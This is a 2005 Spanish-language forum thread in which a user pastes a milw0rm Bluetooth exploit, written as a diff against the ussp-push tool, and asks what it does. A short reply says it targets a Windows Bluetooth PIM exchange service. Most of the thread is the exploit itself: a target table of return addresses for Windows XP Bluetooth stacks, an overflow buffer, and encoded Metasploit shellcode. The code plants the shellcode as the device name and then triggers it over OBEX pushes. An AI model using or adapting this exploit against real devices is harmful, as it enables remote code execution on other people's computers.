Que hace este exploit?

Iniciado por #Borracho.-, 26 Diciembre 2005, 18:00 PM

0 Miembros y 1 Visitante están viendo este tema.

#Borracho.-

Buenas...

Alguien me podría decir que hace realmente este exploit?

#include "obex_socket.h"

-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
#define BT_SERVICE "OBEX"
#define OBEX_PUSH        5

@@ -316,6 +325,9 @@
switch (event)  {
         case OBEX_EV_PROGRESS:
printf("Made some progress...\n");
+ sleep(3);
+ printf("Peace nigga...\n");
+ exit(0);
break;

         case OBEX_EV_ABORT:
@@ -382,9 +394,7 @@
name = remote;

name_len = (strlen(name)+1)<<1;
- if( (namebuf = g_malloc(name_len)) )    {
- OBEX_CharToUnicode(namebuf, name, name_len);
- }
+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode.

buf = easy_readfile(path, &file_size);
if(buf == NULL) {
@@ -424,6 +434,24 @@
return err;
}

+static void set_device_name(int ctl, int hdev, char *opt)  // Johnh as usual...
+{
+         int s = hci_open_dev(hdev);
+
+         if (s < 0) {
+                 fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+                                                 hdev, strerror(errno), errno);
+                 exit(1);
+         }
+         if (opt) {
+                 if (hci_write_local_name(s, opt, 2000) < 0) {
+                         fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+                                                 hdev, strerror(errno), errno);
+                         exit(1);
+                 }
+ }
+
+}

/*
  * That's all there is to it.  With it all setup like this all I have to do
@@ -434,19 +462,87 @@

int main( int argc, char **argv )
{
- if ( argc != 4 ) {
- printf("%s\n\n"
-        "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
-        "\tDEVICE        = RFCOMM TTY device file\n"
-        "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
-        "\tLFILE         = Local file path\n"
-        "\tRFILE         = Remote file name\n\n",
-        UPUSH_APPNAME, argv[0]);
+/*
+ The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+       # Authentication and Encryption (Security Mode 3)
+        auth disable;
+        encrypt disable;
+*/
+
+ struct
+ {
char *os;
u_long ret;
+ }
+ targets[] =
+ {
{ "[ XP Pro SP0   - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
{ "[ XP Pro SP0   - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
{ "[ XP Pro SP0   - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
{ "[ XP Pro SP1a  - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
{ "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
{ "[ Crash ]", 0x41424344 },
+ }, v;
+
+ if ( argc != 3 ) {
+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE        = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]);
+ printf("Types:\n");
+ int i;
for(i = 0; i < sizeof(targets)/sizeof(v); i++)
printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
return( -1 );
}

- printf( "pushing file %s\n", argv[2] );
- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */
+ /* this still crashes the BTStackServer.exe... but oh well */
+ unsigned char scode[] =
+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+
+ set_device_name(0,0,scode);
+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+ //printf( "pushing file.\n");
+
+ char buf[3000];
+ memset(buf,'\0',sizeof(buf));
+ memset(buf,'Z',3); // Sometimes u need 3 z's
+
+        int type = atoi(argv[2]);
+        if(type)
+        {
+        printf("[-] Selected target:\n");
+              printf("    %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);             
+        }
+
+ int x;
+ for(x=0; x<=122; x=x+1)
+ {
+    memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+ }
+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+ printf( "error\n" );
+ return( -1 );
+ }
+ printf("\nsleeping 3 seconds before triggering the shellcode\n");
+ sleep(3);
+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
printf( "error\n" );
return( -1 );
}



// milw0rm.com [2005-12-04]


Fuente: http://www.milw0rm.com/id.php?id=1357


Salu2  ;D
Si nos quedamos en este mundo, que no sea con hambre...

Gospel

Es un exploit para explotar una vulnerabilidad en el servicio de intercambio PIM para Windows. Mira el "target" del exploit...

http://foro.elhacker.net/index.php/topic,97796.0.html